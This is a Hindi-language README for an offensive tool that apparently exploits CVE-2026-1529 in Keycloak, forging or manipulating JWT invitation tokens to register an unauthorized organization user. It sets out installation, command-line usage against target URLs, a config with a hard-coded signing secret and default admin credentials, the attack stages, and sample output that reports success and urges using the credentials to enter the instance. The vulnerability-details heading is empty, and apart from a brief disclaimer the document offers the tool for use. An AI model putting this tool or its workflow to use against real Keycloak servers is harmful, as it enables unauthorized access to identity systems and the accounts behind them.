
Keycloak: अनधिकृत संगठन पंजीकरण अनुचित निमंत्रण टोकन सत्यापन के माध्यम से
CVE-2026-1529: Keycloak - अनुचित आमंत्रण टोकन सत्यापन के माध्यम से अनधिकृत संगठन पंजीकरण
⚠️ चेतावनी: यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।
यह टूल Keycloak (CVE-2026-1529) में एक गंभीर भेद्यता प्रदर्शित करता है जो अनुचित JWT आमंत्रण टोकन सत्यापन के माध्यम से अनधिकृत संगठन पंजीकरण की अनुमति देता है। यह एक्सप्लॉइट Keycloak इंस्टेंस तक अनधिकृत पहुंच प्राप्त करने के लिए आमंत्रण टोकन में हेरफेर करता है।
भेद्यता विवरण:
# रिपॉजिटरी क्लोन करें
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit
# वर्चुअल वातावरण बनाएं
python3 -m venv venv
source venv/bin/activate # Windows पर: venv\Scripts\activate
# निर्भरताएं स्थापित करें
pip install -r requirements.txt
# निर्देशिका संरचना बनाएं
mkdir -p keycloak-exploit/{utils,config,logs,output/reports}
cd keycloak-exploit
# रिलीज़ से फ़ाइलें डाउनलोड करें या मैन्युअल रूप से कॉपी करें
# फिर निर्भरताएं स्थापित करें
pip install requests urllib3 PyJWT
keycloak-exploit/
├── keycloak-exploit.py # मुख्य एक्सप्लॉइट स्क्रिप्ट
├── requirements.txt # Python निर्भरताएं
├── README.md # यह फ़ाइल
├── config/
│ └── default_config.json # कॉन्फ़िगरेशन फ़ाइल
├── utils/
│ ├── __init__.py # पैकेज इनिशियलाइज़र
│ ├── http_utils.py # HTTP क्लाइंट उपयोगिताएं
│ ├── jwt_utils.py # JWT हेरफेर
│ └── crypto_utils.py # क्रिप्टो उपयोगिताएं
├── logs/ # स्वतः-जनित लॉग
└── output/
└── reports/ # एक्सप्लॉइट रिपोर्ट
python3 keycloak-exploit.py https://target-keycloak.com
# कस्टम आमंत्रण टोकन के साथ
python3 keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target.com
# कस्टम संगठन ID के साथ
python3 keycloak-exploit.py -o custom_org_id https://target.com
# कस्टम कॉन्फ़िगरेशन फ़ाइल के साथ
python3 keycloak-exploit.py -c /path/to/config.json https://target.com
# डीबग लॉगिंग सक्षम करें
python3 keycloak-exploit.py -d https://target.com
# सहायता दिखाएं
python3 keycloak-exploit.py -h
# संस्करण दिखाएं
python3 keycloak-exploit.py -v
| तर्क | शॉर्ट | विवरण |
|---|---|---|
target | - | लक्ष्य Keycloak URL (आवश्यक) |
--token | -t | कस्टम आमंत्रण टोकन |
--org-id | -o | कस्टम संगठन ID |
--config | -c | कॉन्फ़िगरेशन फ़ाइल का पथ |
--debug | -d | डीबग लॉगिंग सक्षम करें |
--version | -v | संस्करण जानकारी दिखाएं |
--help | -h | सहायता संदेश दिखाएं |
एक्सप्लॉइट पैरामीटर अनुकूलित करने के लिए config/default_config.json संपादित करें:
{
"exploit": {
"default_username": "admin_user_2026",
"default_password": "KeycloakCVE2026!",
"default_email": "[email protected]",
"timeout": 30,
"max_retries": 3
},
"jwt": {
"algorithm": "HS256",
"secret_key": "keycloak-cve-2026-1529-exploit",
"token_expiry": 3600
},
"target": {
"endpoints": {
"realms": "/realms",
"organizations": "/organizations",
"register": "/register",
"login": "/login"
}
},
"output": {
"log_level": "INFO",
"save_reports": true,
"report_format": "txt"
}
}
| अनुभाग | पैरामीटर | विवरण | डिफ़ॉल्ट |
|---|---|---|---|
exploit | default_username | पंजीकरण के लिए उपयोगकर्ता नाम | admin_user_2026 |
exploit | default_password | पंजीकरण के लिए पासवर्ड | KeycloakCVE2026! |
exploit | default_email | पंजीकरण के लिए ईमेल | [email protected] |
exploit | timeout | HTTP अनुरोध टाइमआउट (सेकंड) | 30 |
exploit | max_retries | अधिकतम HTTP रीट्राई | 3 |
jwt | algorithm | JWT हस्ताक्षर एल्गोरिदम | HS256 |
jwt | secret_key | JWT गुप्त कुंजी | कस्टम |
jwt | token_expiry | टोकन समाप्ति (सेकंड) | 3600 |
एक्सप्लॉइट निम्नलिखित चरणों में काम करता है:
भेद्यता जांच
टोकन जनरेशन/हेरफेर
उपयोगकर्ता पंजीकरण
लॉगिन सत्यापन
रिपोर्ट जनरेशन
output/reports/ में सहेजता है┌─────────────────┐
│ Target Check │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Token Gen/Get │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Token Manipulate│
└────────┬────────┘
│
▼
┌─────────────────┐
│ User Register │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Login Test │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Report Gen │
└─────────────────┘
============================================================
CVE-2026-1529 EXPLOIT RESULTS
============================================================
✓ Target is vulnerable to CVE-2026-1529
🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target.com/realms/master/account
📄 Report saved to: output/reports/exploit_report_20260211_050507.txt
🔐 Use the provided credentials to access the Keycloak instance!
⚠️ This demonstrates unauthorized access due to CVE-2026-1529
============================================================
by f3ds cr3w est, 2002
============================================================
एक विस्तृत रिपोर्ट output/reports/ में सहेजी जाती है जिसमें शामिल हैं:
लॉग विस्तृत निष्पादन जानकारी के साथ logs/ निर्देशिका में सहेजे जाते हैं।